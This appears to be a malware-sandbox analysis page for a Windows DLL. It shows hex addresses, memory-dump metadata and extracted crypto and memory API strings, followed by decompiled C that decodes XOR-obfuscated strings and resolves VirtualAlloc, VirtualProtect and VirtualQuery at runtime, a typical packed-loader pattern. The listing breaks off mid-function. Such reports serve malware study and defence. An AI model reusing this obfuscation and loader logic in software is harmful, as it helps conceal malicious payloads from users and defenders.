                                                                                                                                                                                                                                0x736d5213
                                                                                                                                                                                                                                0x736d5214
                                                                                                                                                                                                                                0x736d5210
                                                                                                                                                                                                                                0x736d5219
                                                                                                                                                                                                                                0x736d521c
                                                                                                                                                                                                                                0x736d5229
                                                                                                                                                                                                                                0x736d522e
                                                                                                                                                                                                                                0x736d522e
                                                                                                                                                                                                                                0x736d5231
                                                                                                                                                                                                                                0x736d5233
                                                                                                                                                                                                                                0x736d5241
                                                                                                                                                                                                                                0x736d5243
                                                                                                                                                                                                                                0x736d5243
                                                                                                                                                                                                                                0x736d5246
                                                                                                                                                                                                                                0x736d5247
                                                                                                                                                                                                                                0x736d5243
                                                                                                                                                                                                                                0x736d524c
                                                                                                                                                                                                                                0x736d524f
                                                                                                                                                                                                                                0x736d525f
                                                                                                                                                                                                                                0x736d5264
                                                                                                                                                                                                                                0x736d5264
                                                                                                                                                                                                                                0x736d5267
                                                                                                                                                                                                                                0x736d526f
                                                                                                                                                                                                                                0x736d527a
                                                                                                                                                                                                                                0x736d5285
                                                                                                                                                                                                                                0x736d5290
                                                                                                                                                                                                                                0x736d52aa
                                                                                                                                                                                                                                0x736d52ac
                                                                                                                                                                                                                                0x736d52b0
                                                                                                                                                                                                                                0x736d52bc
                                                                                                                                                                                                                                0x736d52c3
                                                                                                                                                                                                                                0x736d52c4
                                                                                                                                                                                                                                0x736d52b0
                                                                                                                                                                                                                                0x736d52c9
                                                                                                                                                                                                                                0x736d52ce
                                                                                                                                                                                                                                0x736d52d6
                                                                                                                                                                                                                                0x736d52de
                                                                                                                                                                                                                                0x736d52ef
                                                                                                                                                                                                                                0x736d52f1
                                                                                                                                                                                                                                0x736d52f3
                                                                                                                                                                                                                                0x736d52fc
                                                                                                                                                                                                                                0x736d5300
                                                                                                                                                                                                                                0x736d5301
                                                                                                                                                                                                                                0x736d52f3
                                                                                                                                                                                                                                0x736d5312
                                                                                                                                                                                                                                0x736d5317
                                                                                                                                                                                                                                0x736d5319
                                                                                                                                                                                                                                0x736d5323
                                                                                                                                                                                                                                0x736d5326
                                                                                                                                                                                                                                0x736d532e
                                                                                                                                                                                                                                0x736d5330
                                                                                                                                                                                                                                0x736d5330
                                                                                                                                                                                                                                0x736d5333
                                                                                                                                                                                                                                0x736d5334
                                                                                                                                                                                                                                0x736d5330
                                                                                                                                                                                                                                0x736d5339
                                                                                                                                                                                                                                0x736d533c
                                                                                                                                                                                                                                0x736d5349
                                                                                                                                                                                                                                0x736d534e
                                                                                                                                                                                                                                0x736d534e
                                                                                                                                                                                                                                0x736d5351
                                                                                                                                                                                                                                0x736d5353
                                                                                                                                                                                                                                0x736d5361
                                                                                                                                                                                                                                0x736d5363
                                                                                                                                                                                                                                0x736d5363
                                                                                                                                                                                                                                0x736d5366
                                                                                                                                                                                                                                0x736d5367
                                                                                                                                                                                                                                0x736d5363
                                                                                                                                                                                                                                0x736d536c
                                                                                                                                                                                                                                0x736d536f
                                                                                                                                                                                                                                0x736d537f
                                                                                                                                                                                                                                0x736d5384
                                                                                                                                                                                                                                0x736d5384
                                                                                                                                                                                                                                0x736d5387
                                                                                                                                                                                                                                0x736d538f
                                                                                                                                                                                                                                0x736d539a
                                                                                                                                                                                                                                0x736d53a5
                                                                                                                                                                                                                                0x736d53b0
                                                                                                                                                                                                                                0x736d53ca
                                                                                                                                                                                                                                0x736d53cc
                                                                                                                                                                                                                                0x736d53d0
                                                                                                                                                                                                                                0x736d53dc
                                                                                                                                                                                                                                0x736d53e3
                                                                                                                                                                                                                                0x736d53e4
                                                                                                                                                                                                                                0x736d53d0
                                                                                                                                                                                                                                0x736d53e9
                                                                                                                                                                                                                                0x736d53f1
                                                                                                                                                                                                                                0x736d53fc
                                                                                                                                                                                                                                0x736d5407
                                                                                                                                                                                                                                0x736d5412
                                                                                                                                                                                                                                0x736d541d
                                                                                                                                                                                                                                0x736d5428
                                                                                                                                                                                                                                0x736d5442
                                                                                                                                                                                                                                0x736d5444
                                                                                                                                                                                                                                0x736d5446
                                                                                                                                                                                                                                0x736d5450
                                                                                                                                                                                                                                0x736d545c
                                                                                                                                                                                                                                0x736d5463
                                                                                                                                                                                                                                0x736d5464
                                                                                                                                                                                                                                0x736d5450
                                                                                                                                                                                                                                0x736d5475
                                                                                                                                                                                                                                0x736d547a
                                                                                                                                                                                                                                0x736d547c
                                                                                                                                                                                                                                0x736d5486
                                                                                                                                                                                                                                0x736d5489
                                                                                                                                                                                                                                0x736d5497
                                                                                                                                                                                                                                0x736d54a0
                                                                                                                                                                                                                                0x736d54a0
                                                                                                                                                                                                                                0x736d54a3
                                                                                                                                                                                                                                0x736d54a4
                                                                                                                                                                                                                                0x736d54a0
                                                                                                                                                                                                                                0x736d54a9
                                                                                                                                                                                                                                0x736d54ac
                                                                                                                                                                                                                                0x736d54bc
                                                                                                                                                                                                                                0x736d54c1
                                                                                                                                                                                                                                0x736d54c1
                                                                                                                                                                                                                                0x736d54c4
                                                                                                                                                                                                                                0x736d54c6
                                                                                                                                                                                                                                0x736d54d4
                                                                                                                                                                                                                                0x736d54d6
                                                                                                                                                                                                                                0x736d54d6
                                                                                                                                                                                                                                0x736d54d9
                                                                                                                                                                                                                                0x736d54da
                                                                                                                                                                                                                                0x736d54d6
                                                                                                                                                                                                                                0x736d54df
                                                                                                                                                                                                                                0x736d54e2
                                                                                                                                                                                                                                0x736d54f2
                                                                                                                                                                                                                                0x736d54f7
                                                                                                                                                                                                                                0x736d54f7
                                                                                                                                                                                                                                0x736d54fa
                                                                                                                                                                                                                                0x736d5502
                                                                                                                                                                                                                                0x736d550d
                                                                                                                                                                                                                                0x736d5518
                                                                                                                                                                                                                                0x736d5523
                                                                                                                                                                                                                                0x736d553d
                                                                                                                                                                                                                                0x736d553f
                                                                                                                                                                                                                                0x736d5541
                                                                                                                                                                                                                                0x736d554d
                                                                                                                                                                                                                                0x736d5554
                                                                                                                                                                                                                                0x736d5555
                                                                                                                                                                                                                                0x736d5541
                                                                                                                                                                                                                                0x736d555a
                                                                                                                                                                                                                                0x736d5562
                                                                                                                                                                                                                                0x736d556d
                                                                                                                                                                                                                                0x736d5578
                                                                                                                                                                                                                                0x736d5583
                                                                                                                                                                                                                                0x736d559d
                                                                                                                                                                                                                                0x736d559f
                                                                                                                                                                                                                                0x736d55a1
                                                                                                                                                                                                                                0x736d55ad
                                                                                                                                                                                                                                0x736d55b4
                                                                                                                                                                                                                                0x736d55b5
                                                                                                                                                                                                                                0x736d55a1
                                                                                                                                                                                                                                0x736d55c6
                                                                                                                                                                                                                                0x736d55cb
                                                                                                                                                                                                                                0x736d55cd
                                                                                                                                                                                                                                0x736d55d7
                                                                                                                                                                                                                                0x736d55da
                                                                                                                                                                                                                                0x736d55e8
                                                                                                                                                                                                                                0x736d55ea
                                                                                                                                                                                                                                0x736d55f0
                                                                                                                                                                                                                                0x736d55f0
                                                                                                                                                                                                                                0x736d55f3
                                                                                                                                                                                                                                0x736d55f4
                                                                                                                                                                                                                                0x736d55f0
                                                                                                                                                                                                                                0x736d55f9
                                                                                                                                                                                                                                0x736d55fc
                                                                                                                                                                                                                                0x736d560c
                                                                                                                                                                                                                                0x736d5611
                                                                                                                                                                                                                                0x736d5611
                                                                                                                                                                                                                                0x736d5614
                                                                                                                                                                                                                                0x736d5616
                                                                                                                                                                                                                                0x736d5624
                                                                                                                                                                                                                                0x736d5626
                                                                                                                                                                                                                                0x736d5626
                                                                                                                                                                                                                                0x736d5629
                                                                                                                                                                                                                                0x736d562a
                                                                                                                                                                                                                                0x736d5626
                                                                                                                                                                                                                                0x736d562f
                                                                                                                                                                                                                                0x736d5632
                                                                                                                                                                                                                                0x736d5642
                                                                                                                                                                                                                                0x736d5647
                                                                                                                                                                                                                                0x736d5647
                                                                                                                                                                                                                                0x736d564a
                                                                                                                                                                                                                                0x736d5652
                                                                                                                                                                                                                                0x736d565d
                                                                                                                                                                                                                                0x736d5668
                                                                                                                                                                                                                                0x736d5673
                                                                                                                                                                                                                                0x736d568d
                                                                                                                                                                                                                                0x736d568f
                                                                                                                                                                                                                                0x736d5691
                                                                                                                                                                                                                                0x736d569d
                                                                                                                                                                                                                                0x736d56a4
                                                                                                                                                                                                                                0x736d56a5
                                                                                                                                                                                                                                0x736d5691
                                                                                                                                                                                                                                0x736d56aa
                                                                                                                                                                                                                                0x736d56b2
                                                                                                                                                                                                                                0x736d56bd
                                                                                                                                                                                                                                0x736d56c8
                                                                                                                                                                                                                                0x736d56d3
                                                                                                                                                                                                                                0x736d56de
                                                                                                                                                                                                                                0x736d56f8
                                                                                                                                                                                                                                0x736d56fa
                                                                                                                                                                                                                                0x736d5700
                                                                                                                                                                                                                                0x736d570c
                                                                                                                                                                                                                                0x736d5713
                                                                                                                                                                                                                                0x736d5714
                                                                                                                                                                                                                                0x736d5700
                                                                                                                                                                                                                                0x736d5725
                                                                                                                                                                                                                                0x736d572a
                                                                                                                                                                                                                                0x736d572c
                                                                                                                                                                                                                                0x736d5736
                                                                                                                                                                                                                                0x736d5739
                                                                                                                                                                                                                                0x736d5747
                                                                                                                                                                                                                                0x736d5750
                                                                                                                                                                                                                                0x736d5750
                                                                                                                                                                                                                                0x736d5753
                                                                                                                                                                                                                                0x736d5754
                                                                                                                                                                                                                                0x736d5750
                                                                                                                                                                                                                                0x736d5759
                                                                                                                                                                                                                                0x736d575c
                                                                                                                                                                                                                                0x736d576c
                                                                                                                                                                                                                                0x736d5771
                                                                                                                                                                                                                                0x736d5771
                                                                                                                                                                                                                                0x736d5774
                                                                                                                                                                                                                                0x736d5776
                                                                                                                                                                                                                                0x736d5784
                                                                                                                                                                                                                                0x736d5786
                                                                                                                                                                                                                                0x736d5786
                                                                                                                                                                                                                                0x736d5789
                                                                                                                                                                                                                                0x736d578a
                                                                                                                                                                                                                                0x736d5786
                                                                                                                                                                                                                                0x736d578f
                                                                                                                                                                                                                                0x736d5792
                                                                                                                                                                                                                                0x736d57a2
                                                                                                                                                                                                                                0x736d57a7
                                                                                                                                                                                                                                0x736d57a7
                                                                                                                                                                                                                                0x736d57aa
                                                                                                                                                                                                                                0x736d57b2
                                                                                                                                                                                                                                0x736d57bd
                                                                                                                                                                                                                                0x736d57c8
                                                                                                                                                                                                                                0x736d57d3
                                                                                                                                                                                                                                0x736d57ed
                                                                                                                                                                                                                                0x736d57ef
                                                                                                                                                                                                                                0x736d57f1
                                                                                                                                                                                                                                0x736d57fd
                                                                                                                                                                                                                                0x736d5804
                                                                                                                                                                                                                                0x736d5805
                                                                                                                                                                                                                                0x736d57f1
                                                                                                                                                                                                                                0x736d580a
                                                                                                                                                                                                                                0x736d5812
                                                                                                                                                                                                                                0x736d581d
                                                                                                                                                                                                                                0x736d5828
                                                                                                                                                                                                                                0x736d5833
                                                                                                                                                                                                                                0x736d584d
                                                                                                                                                                                                                                0x736d584f
                                                                                                                                                                                                                                0x736d5851
                                                                                                                                                                                                                                0x736d585d
                                                                                                                                                                                                                                0x736d5864
                                                                                                                                                                                                                                0x736d5865
                                                                                                                                                                                                                                0x736d5851
                                                                                                                                                                                                                                0x736d5876
                                                                                                                                                                                                                                0x736d587b
                                                                                                                                                                                                                                0x736d587d
                                                                                                                                                                                                                                0x736d5887
                                                                                                                                                                                                                                0x736d588a
                                                                                                                                                                                                                                0x736d5898
                                                                                                                                                                                                                                0x736d589a
                                                                                                                                                                                                                                0x736d58a0
                                                                                                                                                                                                                                0x736d58a0
                                                                                                                                                                                                                                0x736d58a3
                                                                                                                                                                                                                                0x736d58a4
                                                                                                                                                                                                                                0x736d58a0
                                                                                                                                                                                                                                0x736d58a9
                                                                                                                                                                                                                                0x736d58ac
                                                                                                                                                                                                                                0x736d58bc
                                                                                                                                                                                                                                0x736d58c1
                                                                                                                                                                                                                                0x736d58c1
                                                                                                                                                                                                                                0x736d58c4
                                                                                                                                                                                                                                0x736d58c6
                                                                                                                                                                                                                                0x736d58d4
                                                                                                                                                                                                                                0x736d58d6
                                                                                                                                                                                                                                0x736d58d6
                                                                                                                                                                                                                                0x736d58d9
                                                                                                                                                                                                                                0x736d58da
                                                                                                                                                                                                                                0x736d58d6
                                                                                                                                                                                                                                0x736d58df
                                                                                                                                                                                                                                0x736d58e2
                                                                                                                                                                                                                                0x736d58f2
                                                                                                                                                                                                                                0x736d58f7
                                                                                                                                                                                                                                0x736d58f7
                                                                                                                                                                                                                                0x736d58fa
                                                                                                                                                                                                                                0x736d5902
                                                                                                                                                                                                                                0x736d590d
                                                                                                                                                                                                                                0x736d5918
                                                                                                                                                                                                                                0x736d5923
                                                                                                                                                                                                                                0x736d593d
                                                                                                                                                                                                                                0x736d593f
                                                                                                                                                                                                                                0x736d5941
                                                                                                                                                                                                                                0x736d594d
                                                                                                                                                                                                                                0x736d5954
                                                                                                                                                                                                                                0x736d5955
                                                                                                                                                                                                                                0x736d5941
                                                                                                                                                                                                                                0x736d595a
                                                                                                                                                                                                                                0x736d5962
                                                                                                                                                                                                                                0x736d596d
                                                                                                                                                                                                                                0x736d5978
                                                                                                                                                                                                                                0x736d5983
                                                                                                                                                                                                                                0x736d599d
                                                                                                                                                                                                                                0x736d599f
                                                                                                                                                                                                                                0x736d59a1
                                                                                                                                                                                                                                0x736d59ad
                                                                                                                                                                                                                                0x736d59b4
                                                                                                                                                                                                                                0x736d59b5
                                                                                                                                                                                                                                0x736d59a1
                                                                                                                                                                                                                                0x736d59c6
                                                                                                                                                                                                                                0x736d59cb
                                                                                                                                                                                                                                0x736d59cd
                                                                                                                                                                                                                                0x736d59d7
                                                                                                                                                                                                                                0x736d59da
                                                                                                                                                                                                                                0x736d59e8
                                                                                                                                                                                                                                0x736d59ea
                                                                                                                                                                                                                                0x736d59f0
                                                                                                                                                                                                                                0x736d59f0
                                                                                                                                                                                                                                0x736d59f3
                                                                                                                                                                                                                                0x736d59f4
                                                                                                                                                                                                                                0x736d59f0
                                                                                                                                                                                                                                0x736d59f9
                                                                                                                                                                                                                                0x736d59fc
                                                                                                                                                                                                                                0x736d5a0c
                                                                                                                                                                                                                                0x736d5a11
                                                                                                                                                                                                                                0x736d5a11
                                                                                                                                                                                                                                0x736d5a14
                                                                                                                                                                                                                                0x736d5a16
                                                                                                                                                                                                                                0x736d5a24
                                                                                                                                                                                                                                0x736d5a26
                                                                                                                                                                                                                                0x736d5a26
                                                                                                                                                                                                                                0x736d5a29
                                                                                                                                                                                                                                0x736d5a2a
                                                                                                                                                                                                                                0x736d5a26
                                                                                                                                                                                                                                0x736d5a2f
                                                                                                                                                                                                                                0x736d5a32
                                                                                                                                                                                                                                0x736d5a42
                                                                                                                                                                                                                                0x736d5a47
                                                                                                                                                                                                                                0x736d5a47
                                                                                                                                                                                                                                0x736d5a4a
                                                                                                                                                                                                                                0x736d5a52
                                                                                                                                                                                                                                0x736d5a5d
                                                                                                                                                                                                                                0x736d5a68
                                                                                                                                                                                                                                0x736d5a73
                                                                                                                                                                                                                                0x736d5a8d
                                                                                                                                                                                                                                0x736d5a8f
                                                                                                                                                                                                                                0x736d5a91
                                                                                                                                                                                                                                0x736d5a9d
                                                                                                                                                                                                                                0x736d5aa4
                                                                                                                                                                                                                                0x736d5aa5
                                                                                                                                                                                                                                0x736d5a91
                                                                                                                                                                                                                                0x736d5aaa
                                                                                                                                                                                                                                0x736d5ab2
                                                                                                                                                                                                                                0x736d5abd
                                                                                                                                                                                                                                0x736d5ac8
                                                                                                                                                                                                                                0x736d5ad3
                                                                                                                                                                                                                                0x736d5ade
                                                                                                                                                                                                                                0x736d5af8
                                                                                                                                                                                                                                0x736d5afa
                                                                                                                                                                                                                                0x736d5b00
                                                                                                                                                                                                                                0x736d5b0c
                                                                                                                                                                                                                                0x736d5b13
                                                                                                                                                                                                                                0x736d5b14
                                                                                                                                                                                                                                0x736d5b00
                                                                                                                                                                                                                                0x736d5b25
                                                                                                                                                                                                                                0x736d5b2a
                                                                                                                                                                                                                                0x736d5b2c
                                                                                                                                                                                                                                0x736d5b36
                                                                                                                                                                                                                                0x736d5b39
                                                                                                                                                                                                                                0x736d5b47
                                                                                                                                                                                                                                0x736d5b50
                                                                                                                                                                                                                                0x736d5b50
                                                                                                                                                                                                                                0x736d5b53
                                                                                                                                                                                                                                0x736d5b54
                                                                                                                                                                                                                                0x736d5b50
                                                                                                                                                                                                                                0x736d5b59
                                                                                                                                                                                                                                0x736d5b5c
                                                                                                                                                                                                                                0x736d5b6c
                                                                                                                                                                                                                                0x736d5b71
                                                                                                                                                                                                                                0x736d5b71
                                                                                                                                                                                                                                0x736d5b74
                                                                                                                                                                                                                                0x736d5b76
                                                                                                                                                                                                                                0x736d5b84
                                                                                                                                                                                                                                0x736d5b86
                                                                                                                                                                                                                                0x736d5b86
                                                                                                                                                                                                                                0x736d5b89
                                                                                                                                                                                                                                0x736d5b8a
                                                                                                                                                                                                                                0x736d5b86
                                                                                                                                                                                                                                0x736d5b8f
                                                                                                                                                                                                                                0x736d5b92
                                                                                                                                                                                                                                0x736d5ba2
                                                                                                                                                                                                                                0x736d5ba7
                                                                                                                                                                                                                                0x736d5bad

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: OxtHeapAlloc$ UxtHeapReAlloc$$yH$7\o8$9GGL$<fS$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$B]~$B^`"$CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptImportKey$CryptReleaseContext$CryptSetKeyParam$GetProcessHeap$HeapFree$HeapSize$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$Km2$VirtualAlloc$VirtualFree$VirtualProtect$`gxtVirtualQuery$n/v$d/{$e"
                                                                                                                                                                                                                                • API String ID: 0-1114865788
                                                                                                                                                                                                                                • Opcode ID: ac2a034776c43a60a8132d3a0496f08a25883471731790b24b611c332d5370db
                                                                                                                                                                                                                                • Instruction ID: c5e948a52362b1b4cd3424fcc318d593ffbf6df6df485cf9a7048a6aa91476c7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac2a034776c43a60a8132d3a0496f08a25883471731790b24b611c332d5370db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41A2B3B052C3C49FE726DF14D585BEBBBE4AB82308F59086DD1CB8A6D2E73194448B47
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D48B0, Relevance: 51.1, Strings: 40, Instructions: 1055COMMONCrypto
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 98%
                                                                                                                                                                                                                                			E736D48B0(void* __edi) {
				intOrPtr _v7;
				intOrPtr _v11;
				intOrPtr _v15;
				intOrPtr _v19;
				intOrPtr _v23;
				char _v27;
				char _v31;
				intOrPtr _v35;
				intOrPtr _v39;
				intOrPtr _v43;
				intOrPtr _v47;
				char _v51;
				char _v55;
				intOrPtr _v59;
				intOrPtr _v63;
				intOrPtr _v67;
				intOrPtr _v71;
				char _v75;
				char _v79;
				intOrPtr _v83;
				intOrPtr _v87;
				intOrPtr _v91;
				char _v95;
				char _v99;
				intOrPtr _v103;
				intOrPtr _v107;
				intOrPtr _v111;
				char _v115;
				char _v119;
				intOrPtr _v123;
				intOrPtr _v127;
				intOrPtr _v131;
				char _v135;
				char _v139;
				intOrPtr _v143;
				intOrPtr _v147;
				intOrPtr _v151;
				char _v155;
				char _v159;
				intOrPtr _v163;
				intOrPtr _v167;
				intOrPtr _v171;
				char _v175;
				char _v179;
				intOrPtr _v183;
				intOrPtr _v187;
				intOrPtr _v191;
				char _v195;
				char _v199;
				intOrPtr _v203;
				intOrPtr _v207;
				intOrPtr _v211;
				char _v215;
				char _v219;
				intOrPtr _v223;
				intOrPtr _v227;
				intOrPtr _v231;
				char _v235;
				char _v239;
				intOrPtr _v243;
				intOrPtr _v247;
				intOrPtr _v251;
				char _v255;
				char _v259;
				intOrPtr _v263;
				intOrPtr _v267;
				intOrPtr _v271;
				char _v275;
				char _v279;
				intOrPtr _v283;
				intOrPtr _v287;
				intOrPtr _v291;
				char _v295;
				char _v299;
				intOrPtr _v303;
				intOrPtr _v307;
				intOrPtr _v311;
				char _v315;
				char _v319;
				intOrPtr _v323;
				intOrPtr _v327;
				intOrPtr _v331;
				char _v335;
				char _v339;
				intOrPtr _v343;
				intOrPtr _v347;
				intOrPtr _v351;
				char _v355;
				char _v359;
				intOrPtr _v363;
				intOrPtr _v367;
				intOrPtr _v371;
				char _v375;
				char _v379;
				intOrPtr _v383;
				intOrPtr _v387;
				intOrPtr _v391;
				char _v395;
				char _v399;
				intOrPtr _v403;
				intOrPtr _v407;
				intOrPtr _v411;
				char _v415;
				char _v419;
				intOrPtr _v423;
				intOrPtr _v427;
				intOrPtr _v431;
				char _v435;
				char _v439;
				intOrPtr _v443;
				intOrPtr _v447;
				intOrPtr _v451;
				char _v455;
				char _v459;
				intOrPtr _v463;
				intOrPtr _v467;
				intOrPtr _v471;
				char _v475;
				char _v479;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				char _v495;
				intOrPtr _v496;
				char _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				char _v515;
				intOrPtr _v516;
				char _v519;
				char _v520;
				intOrPtr _v523;
				intOrPtr _v527;
				char _v531;
				char _v535;
				intOrPtr _v539;
				intOrPtr _v543;
				char _v547;
				char _v551;
				intOrPtr _v555;
				intOrPtr _v559;
				char _v563;
				char _v567;
				intOrPtr _v571;
				intOrPtr _v575;
				char _v579;
				char _v583;
				intOrPtr _v587;
				intOrPtr _v591;
				char _v595;
				char _v599;
				char* _t514;
				char* _t515;
				char* _t519;
				char* _t520;
				char* _t524;
				char* _t525;
				char* _t529;
				char* _t530;
				char* _t534;
				char* _t535;
				char* _t539;
				char* _t540;
				char* _t544;
				char* _t545;
				char* _t549;
				char* _t550;
				char* _t554;
				char* _t555;
				char* _t559;
				char* _t560;
				char* _t564;
				char* _t565;
				char* _t569;
				char* _t570;
				char* _t574;
				char* _t575;
				char* _t579;
				char* _t580;
				char* _t584;
				char* _t585;
				void* _t705;
				void* _t707;
				void* _t709;
				void* _t711;
				void* _t713;
				void* _t715;
				void* _t717;
				void* _t719;
				void* _t721;
				void* _t723;
				void* _t725;
				void* _t727;
				void* _t729;
				void* _t731;
				void* _t733;
				void* _t735;
				void* _t737;
				void* _t739;
				void* _t741;
				void* _t743;
				void* _t745;
				void* _t747;
				void* _t749;
				void* _t751;
				void* _t753;
				void* _t755;
				void* _t757;
				void* _t759;
				void* _t761;
				void* _t763;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				void* _t795;
				signed int _t796;
				void* _t798;
				void* _t799;
				void* _t800;
				void* _t801;
				void* _t802;
				void* _t803;
				void* _t804;
				void* _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t810;
				void* _t811;
				void* _t812;
				void* _t813;
				void* _t814;

				_t795 = __edi;
				_t798 = (_t796 & 0xfffffff8) - 0x258;
				_v500 = 0;
				_v496 = 0x442c1809;
				_v492 = 0x384d1107;
				_v488 = 0x6612396c;
				_v484 = 0xa7e5d42;
				if(_v500 == 0) {
					_t794 = 0;
					do {
						 *(_t798 + 0x6c + _t794 * 4) =  *(_t798 + 0x6c + _t794 * 4) ^ 0x0a7e5d42;
						_t794 = _t794 + 1;
					} while (_t794 < 4);
				}
				_v520 = 0;
				_v516 = 0x55905f81;
				_v512 = 0x608e57a2;
				_v508 = 0x428d5abb;
				_v504 = 0x21e236d7;
				_t799 = _t798 + 1;
				asm("xlatb");
				asm("loop 0x24");
				if(_v519 == 0) {
					_t793 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t799 + 0x58 + _t793 * 4) =  *(_t799 + 0x58 + _t793 * 4) ^ 0x21e236d7;
						_t793 = _t793 + 1;
					} while (_t793 < 4);
				}
				E736D7DE0(_t795, "VirtualAlloc", 0, 0x200);
				_t705 = 0;
				 *0x736efd48 = 0;
				_t800 = _t799 + 0xc;
				_t514 =  &_v515;
				if(_v515 != 0) {
					do {
						_t514 = _t514 + 1;
						_t705 = _t705 + 1;
					} while ( *_t514 != 0);
				}
				_t706 = _t705 + 1;
				if(_t705 + 1 != 0) {
					E736D82C0("VirtualAlloc",  &_v515, _t706);
					_t800 = _t800 + 0xc;
				}
				_t707 = 0;
				_t515 =  &_v495;
				if(_v495 != 0) {
					do {
						_t515 = _t515 + 1;
						_t707 = _t707 + 1;
					} while ( *_t515 != 0);
				}
				_t708 = _t707 + 1;
				if(_t707 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_v495, _t708);
					_t800 = _t800 + 0xc;
				}
				_v459 = 0;
				_v455 = 0x59114582;
				_v451 = 0x25704c8c;
				_v447 = 0x7b2f64e7;
				_v443 = 0x174300c9;
				if(_v459 == 0) {
					_t792 = 0;
					do {
						 *(_t800 + 0x94 + _t792 * 4) =  *(_t800 + 0x94 + _t792 * 4) ^ 0x174300c9;
						_t792 = _t792 + 1;
					} while (_t792 < 4);
				}
				_v479 = 0;
				_v475 = 0x1a6ef159;
				_v471 = 0x3e70f97a;
				_v467 = 0xb68f77d;
				_v463 = 0x6e1cec6c;
				if(_v479 == 0) {
					_t791 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t800 + 0x80 + _t791 * 4) =  *(_t800 + 0x80 + _t791 * 4) ^ 0x6e1c980f;
						_t791 = _t791 + 1;
					} while (_t791 < 4);
				}
				E736D7DE0(_t795, "VirtualProtect", 0, 0x200);
				_t709 = 0;
				 *0x736eff4c = 0;
				_t801 = _t800 + 0xc;
				_t519 =  &_v475;
				if(_v475 != 0) {
					do {
						_t519 = _t519 + 1;
						_t709 = _t709 + 1;
					} while ( *_t519 != 0);
				}
				_t710 = _t709 + 1;
				if(_t709 + 1 != 0) {
					E736D82C0("VirtualProtect",  &_v475, _t710);
					_t801 = _t801 + 0xc;
				}
				_t711 = 0;
				_t520 =  &_v455;
				if(_v455 != 0) {
					do {
						_t520 = _t520 + 1;
						_t711 = _t711 + 1;
					} while ( *_t520 != 0);
				}
				_t712 = _t711 + 1;
				if(_t711 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_v455, _t712);
					_t801 = _t801 + 0xc;
				}
				_v419 = 0;
				_v415 = 0x2150272;
				_v411 = 0x7e740b7c;
				_v407 = 0x202b2317;
				_v403 = 0x4c474739;
				if(_v419 == 0) {
					_t790 = 0;
					do {
						 *(_t801 + 0xbc + _t790 * 4) =  *(_t801 + 0xbc + _t790 * 4) ^ 0x4c474739;
						_t790 = _t790 + 1;
					} while (_t790 < 4);
				}
				_v439 = 0;
				_v435 = 0x5b9ae549;
				_v431 = 0x7e84ed6a;
				_v427 = 0x569ae96a;
				_v423 = 0x2fe88c1f;
				if(_v439 == 0) {
					_t789 = 0;
					do {
						 *(_t801 + 0xa8 + _t789 * 4) =  *(_t801 + 0xa8 + _t789 * 4) ^ 0x2fe88c1f;
						_t789 = _t789 + 1;
					} while (_t789 < 4);
				}
				E736D7DE0(_t795, "VirtualQuery", 0, 0x200);
				_t713 = 0;
				 *0x736f0150 = 0;
				_t802 = _t801 + 0xc;
				_t524 =  &_v435;
				if(_v435 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t524 = _t524 + 1;
						_t713 = _t713 + 1;
					} while ( *_t524 != 0);
				}
				_t714 = _t713 + 1;
				if(_t713 + 1 != 0) {
					E736D82C0("VirtualQuery",  &_v435, _t714);
					_t802 = _t802 + 0xc;
				}
				_t715 = 0;
				_t525 =  &_v415;
				if(_v415 != 0) {
					do {
						_t525 = _t525 + 1;
						_t715 = _t715 + 1;
					} while ( *_t525 != 0);
				}
				_t716 = _t715 + 1;
				if(_t715 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_v415, _t716);
					_t802 = _t802 + 0xc;
				}
				_v399 = 0;
				_v395 = 0x40b17d1a;
				_v391 = 0x3cd07414;
				_v387 = 0x628f5c7f;
				_v383 = 0xee33851;
				if(_v399 == 0) {
					_t788 = 0;
					do {
						 *(_t802 + 0xd0 + _t788 * 4) =  *(_t802 + 0xd0 + _t788 * 4) ^ 0x0ee33851;
						_t788 = _t788 + 1;
